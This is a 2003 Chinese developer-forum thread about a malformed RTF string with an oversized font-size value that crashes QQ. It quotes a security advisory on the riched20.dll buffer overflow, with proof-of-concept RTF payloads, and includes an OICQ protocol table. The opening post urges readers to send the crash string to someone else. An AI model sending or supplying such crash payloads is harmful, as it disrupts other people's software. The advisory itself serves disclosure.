QQ死机的BUG?不信你就试试了。

caimouse
人工智能领域优质创作者
博客专家认证
2003-02-20 02:45:42
你发下面代码给对方:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fcharset134 'cb'ce'cc'e5;}}
\fs1800000000000000000000000000000

1。因为它用了RICHTEXT。
这是BUG。

我试过了。
...全文
272 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
riverboat 2003-02-26
  • 打赏
  • 举报
回复
gz
flowater1026 2003-02-26
  • 打赏
  • 举报
回复
没有死机啊~~~
ccrun.com 2003-02-26
  • 打赏
  • 举报
回复
赶快打补丁了。
csdsq 2003-02-26
  • 打赏
  • 举报
回复
不QQ还要死机呢...
省省吧!
dszsun 2003-02-25
  • 打赏
  • 举报
回复
penu 2003-02-20
  • 打赏
  • 举报
回复
哎呀,在CSDB首页就有相关新闻链接!
jishiping 2003-02-20
  • 打赏
  • 举报
回复
请看这条新闻消息:
http://news.onlinedown.net/shownews.asp?id=4238
kk_liwei 2003-02-20
  • 打赏
  • 举报
回复
mark!
caimouse 2003-02-20
  • 打赏
  • 举报
回复
Riched20.DLL attribute label buffer overflow vulnerability
From: Jie Dong (Thkrdev@yoursft.com)
Date: Sun Feb 16 2003 - 13:30:50 GMT

Next message: Niels Provos: "The First Honeyd Challenge"
Previous message: @stake Advisories: "@stake Advisory: MacOS X TruBlueEnvironment Privilege Escalation Attack"
Next in thread: 3APA3A: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Maybe reply: 3APA3A: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--------------------------------------------------------------------------------

('binary' encoding is not supported, stored as-is) ===========================================================================
=====
Security Defence Stdio vulnerability announcement [001]
Riched20.DLL attribute label buffer overflow vulnerability
URL:http:\\www.yoursft.com
Author: Thrkdev
finds date:2003年2月1日
Announce date:2003年2月14日


Affected system: Microsoft Windows 98
Microsoft Windows 2000
Microsoft Windows XP
Perhaps,this vulnerability was still in other operating
system, but untest .
EMAIL: Thkrdev@yoursft.com
------------------------------------------------------------------------
Technical description:
A buffer overflow vulnerability exists in riched20.dll,which can result
in the collapse
of the application program that use the corresponding function of the DLL
module, But it is
very difficult to have the effect of allowing an attacker to execute
commands on a user抯 system.

This problem exists in the analysed RTF file code, and there is an
overflows when drawing
figure-string( such as the size of the character) in the file form .This
overflow seem not to
be used for executing commands.
The following RTFfile may result in illegal operation :
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
"\fs" was used for setting the size of the followingly
words "www.yoursft.com". when the figure-string
that set the size of the fonts exceeding 1024byte(>1024b) , it Will cause
the buffer overflow ;And when
exceeding 65536byte(>65536b) it will probably cause crashing the
application program.
This promblom Not only appear in the setting of "\fs" , other attribute
will have the same problem under
the similar situation. And this following RTF files Will also result in
operating illegally :
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222
\fs180 www.yoursft.com\fs20\par
}
The terrible thing is nowadays lots of software was affected by this
vulnerability. The attacker can send a
malicious message that include exploiting the vulnerability, then when you
read this message your program will be crashed.

------------------------------------------------------------------------
Security Defence Stdio is a software development / technological websites,
mainly developing NET security products ,
the software of Security Defence Stdio --Trojan Ender-- receives users'
extensive favorable comment




--------------------------------------------------------------------------------

Next message: Niels Provos: "The First Honeyd Challenge"
Previous message: @stake Advisories: "@stake Advisory: MacOS X TruBlueEnvironment Privilege Escalation Attack"
Next in thread: 3APA3A: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Maybe reply: 3APA3A: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--------------------------------------------------------------------------------

This archive was generated by hypermail 2b29 : Thu Feb 20 2003 - 04:00:02 GMT
cscer 2003-02-20
  • 打赏
  • 举报
回复
QQ协议:
协议由报文头(T)+发送者(T)+接收者(T)+报文类型(T)+报文长度(L)+报文内容组成 。
发送者和接收者是系统内的程序种类,OICQ服务器0x01,传真服务器0x02,WEB服务器0x03,
打印服务器是0x04,聊天服务器是0x05,OICQ用户是0x0A。

OICQ用户到OICQ服务器的通讯协议 引导符 (0x81+0x0A+0x01)
报文类型 报文内容 报文说明
0x01 昵称(S)+肖像(M)+用户密码(S)+性别(T)+年龄(T)+真实姓名(S)+国家/地区(T)+省(T)+市(S)+地址(S)+邮编(S)+学历(T)+毕业院校(S)+职业(T)+电话(S)+寻呼(S)+电邮(S)+爱好(S)+说明(S)+身份验证(T)新用户注册,身份验证用于当有人要将他加入好友时询问是否允许
0x02 服务号(L)+密码(S)+注册方式(T)老用户注册,方式分为0正常,1隐身
0x03 服务号(L)+对方服务号(L)+内容(S) 发送信息到某人
0x04 服务号(L)+组号(L)+内容(S) 广播信息,组号=0为全体
0x05 服务号(L)+朋友服务号(L) 查看朋友资料
0x06 服务号(L)+组名称(S) 增加组
0x07 服务号(L)+组编号(T)+组名称(S) 修改组名称
0x08 服务号(L)+组编号(T) 删除组
0x09 服务号(L)+移动人数(T)+{朋友服务号(L)+目的组号(T)} 移动组成员
0x0a 服务号(L)+起始编号(L)+回传个数(T)+查找标志(T) 看谁在线上
查找标志 1=向小找 2=向大找
0x0b 服务号(L)+SQL语句(S) 自定义查找
0x0c 服务号(L)+朋友服务号(L) 增加好友
0x0d 服务号(L)+朋友服务号(L)+加入原因(S) 请求加入好友
0x0e 服务号(L)+朋友服务号(L) 删除好友
0x10 服务号(L)+显示模式(T) 更改显示方式 1上线2隐藏3免打扰4离线
0x11 服务号(L)+监视服务号(L) 监视某人谈话
0x12 服务号(L)+昵称(S)+肖像(M)+用户密码(S)+性别(T)+年龄(T)+真实姓名(S)+国家/地区(T)+省(T)+市(S)+地址(S)+邮编(S)+学历(T)+毕业院校(S)+职业(T)+电话(S)+寻呼(S)+电邮(S)+爱好(S)+说明(S)+身份验证(T)更改用户基本信息
0x13 服务号(L)+朋友服务号(L)+文件名(S)+文件长度(L) 请求发送文件
0x14 服务号(L)+朋友服务号(L)+允许/拒绝 是否允许发送文件
0x15 服务号(L)+朋友服务号(L)+文件内容(B) 发送文件
0x16 服务号(L) 连接测试报文
0x17 服务号(L)+朋友服务号(L)+同意标志(T) 应答对方请求加入好友
0=拒绝
1=同意
OICQ服务器到OICQ的通讯协议
报文类型 报文内容 报文说明
0x01 成功/失败(T)+服务号(L) 新用户注册结果返回
0x02 成功/失败(T)+组个数(T)+{组名称(S)+组编号(T)+朋友个数(T)+{朋友服务号(L)+肖像编号(T)+朋友状态(T)+朋友昵称(S)} 老用户注册结果返回
朋友状态
1=上线=2隐藏=3免打扰4离线
0x03 标志(T) + 朋友服务号(L)+信息(S)+信息类型(T) 标志 1=系统 2=用户
发送消息,服务号=0是系统消息
1=用户某某已经把你加为好友
2=用户某某请求你通过身份验证
3=用户某某同意了你的验证要求
4=用户某某拒绝了你的验证请求
0x04 成功/失败(T)+朋友服务号(L)+昵称(S)+肖像(M)+性别(T)+年龄(T)+真实姓名(S)+国家/地区(T)+省(T)+市(S)+地址(S)+邮编(S)+学历(T)+毕业院校(S)+职业(T)+电话(S)+寻呼(S)+电邮(S)+爱好(S)+说明(S)朋友信息回送
0x05 成功/失败(T)+组编号(T)+组名称(S) 增加组结果回送 1/0
0x06 成功/失败(T)+组编号(T)+组名称(S)修改组名称结果回送1/0
0x07 成功/失败(T)+组编号(T) 删除组结果回送1/0
0x08 成功/失败(T) 移动组成员结果回送1/0
0x09 成功/失败(T)+在线个数(T)+{服务号(L)+昵称(S)+肖像(M)+省(T)+市(S)} 查找在线人员结果回送
0x0a 成功/失败(T)+找到个数(T)+{服务号(L)+昵称(S)+肖像(M)+省(T)+市(S)} 自定义查找结果回送(最多50)
0x0b 标志(T)+朋友服务号(L) 增加好友结果回送标志
0=数据库失败
=1成功
=2需要身份验证
=3对方不允许加入
=4需要身份验证且不在线
0x0c 朋友服务号(L)+昵称(S)+肖像号(M)+朋友状态(T) 给在线用户增加好友
0x0e 成功/失败(T)+朋友服务号(L) 删除好友结果回送
0x10 服务号(L)+显示模式(T) 显示模式回送 =1上线=2隐藏=3免打扰 4离线
0x11 成功/失败 更改用户基本信息结果回送
0x12 朋友服务号(L)+文件名(S)+文件长度(L) 请求发送文件
0x13 朋友服务号(L)+允许/拒绝 是否允许发送文件 1允许 0拒绝
0x14 朋友服务号(L)+文件内容(B) 发送文件
0x15 朋友服务号(L)+当前状态(T)朋友状态回送(系统发送)=1上线=2隐藏=3免打扰4离线
0x16 服务号(L) 连接测试
caimouse 2003-02-20
  • 打赏
  • 举报
回复
大家来分析原因啊。

552

社区成员

发帖
与我相关
我的任务
社区描述
C++ Builder 茶馆
社区管理员
  • 茶馆
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧